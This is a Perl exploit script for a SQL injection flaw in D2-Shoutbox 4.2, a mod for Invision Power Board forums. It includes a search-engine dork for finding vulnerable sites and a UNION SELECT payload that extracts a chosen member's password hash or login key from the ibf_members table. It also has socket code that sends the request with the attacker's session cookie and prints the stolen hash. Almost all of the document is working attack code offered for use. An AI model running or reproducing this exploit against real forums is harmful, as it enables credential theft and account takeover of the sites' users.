D2-Shoutbox 4.2 IPB Mod

1. #!/usr/bin/perl
2. #########################################################
3. #        _______ _______ ______         #
4. #        |______ |______ |     \        #
5. #        ______| |______ |_____/        #
6. #                                       #
7. #D2-Shoutbox 4.2(IPB Mod)<=SQL injection     #
8. #Created By Aluf                                        #
9. #SED security Team                                      #
10. #http://www.sed-team.be                                 #
11. #ISRAEL                                                 #
12. #########################################################
13. #google:
14. #"Powered By D2-Shoutbox 4.2"
15. #########################################################
16. use IO::Socket;
17. $host = $ARGV[0];
18. $user = $ARGV[2];
19. $uid  = $ARGV[3];
20. $pid  = $ARGV[4];
21. $type = $ARGV[5];
22.  
23. sub type()
24. {
25. if($type==1){$row="password";}
26. if($type==2){$row="member_login_key";}
27. else{print "Just 1 Or 2\n";exit();}
28. $sql="index.php?act=Shoutbox&view=saved&load=-1%20UNION%20SELECT%20null,null,null,null,".$row.",null,null,null%20FROM%20ibf_members%20where%20id=".$user."/*";
29. $path = $ARGV[1].$sql;
30. }
31.  
32.  
33. sub header()
34. {
35. print q{
36. #######################################################################
37. ###      D2-Shoutbox 4.2 SQL injection Exploit              ###
38. ###      Tested On D2-Shoutbox 4.2 And IPB 2.4              ###
39. ###       Created By SkOd, Sed Security Team                ###
40. #######################################################################
41. sedSB.pl [HOST] [DIR] [victim] [my id] [my md5 hash] [1-(1.*)/2-(2.*)]
42. sedSB.pl www.host.com /forum/ 2 4500 f3b8a336b250ee595dc6ef6bac38b647 2
43. #######################################################################
44. }
45. }
46.  
47. sub sedsock()
48. {
49. $sedsock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => "80") || die "[-]Connect Failed\r\n";
50. print $sedsock "GET $path HTTP/1.1\n";
51. print $sedsock "Host: $host\n";
52. print $sedsock "Accept: */*\n";
53. print $sedsock "Cookie: member_id=$uid; pass_hash=$pid\n";
54. print $sedsock "Connection: close\n\n";
55. while($res = <$sedsock>){
56. $res =~ m/shout_s'>(.*?)<\/textarea>/ && print "[+]User: $user\n[+]Md5 Hash: $1\n";
57. }
58. }
59.  
60. if(@ARGV < 6){
61. header();
62. }else{
63. type();
64. sedsock();
65. }